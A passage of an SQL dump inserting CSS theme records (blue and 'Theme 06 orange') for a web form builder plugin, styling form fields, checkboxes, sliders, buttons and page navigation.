#0176AA ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #0176AA;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #008AFF;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #0073D3 ;\r\n	background: -moz-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0073D3 ), color-stop(39%, #008FE1 ), color-stop(100%, #00A7ED ));\r\n	background: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n	background: -o-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\nbackground: -webkit-linear-gradient(left, #0073D3 0%, #008FE1 39%, #00A7ED 100%);\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #0176AA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}', 0),
(22, 'Theme 06 orange', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #FAB17A;\r\nmargin-bottom: 10px;\r\ncolor: #FAB17A;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #FFA15C !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #473C34;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FFA15C;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #C78655;\r\n}\r\n\r\n.next-page div.wdform-page-button:hover {\r\n	background:url([SITE_ROOT]/images/06/01/next.png) no-repeat right #FAB17A;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\ncolor: #473C34;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 35px;\r\nline-height: 35px;\r\nbackground: #FFA15C;\r\npadding: 0px 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder: 1px solid #C78655;\r\n}\r\n.button-submit:hover {\r\n	background: #FAB17A;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2{\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #FFA15C ;\r\n	color: #030303;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: " " ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="password"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type="text"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #FFA15C ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #FFA15C ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #342114;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #C78655;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #342114;\r\n	cursor: pointer;\r\n	background-color: #FF8A34;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #FF8932 ;\r\n	background: -moz-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3BA28 ), color-stop(39%, #FFD325 ), color-stop(100%, #FEB824 ));\r\n	background: -o-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -ms-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\nbackground: -webkit-linear-gradient(left, #F3BA28 0%, #FFD325 39%, #FEB824 100%);\r\n\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\nbackground-color: #ECBE9C;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #473C34;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}', 0);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
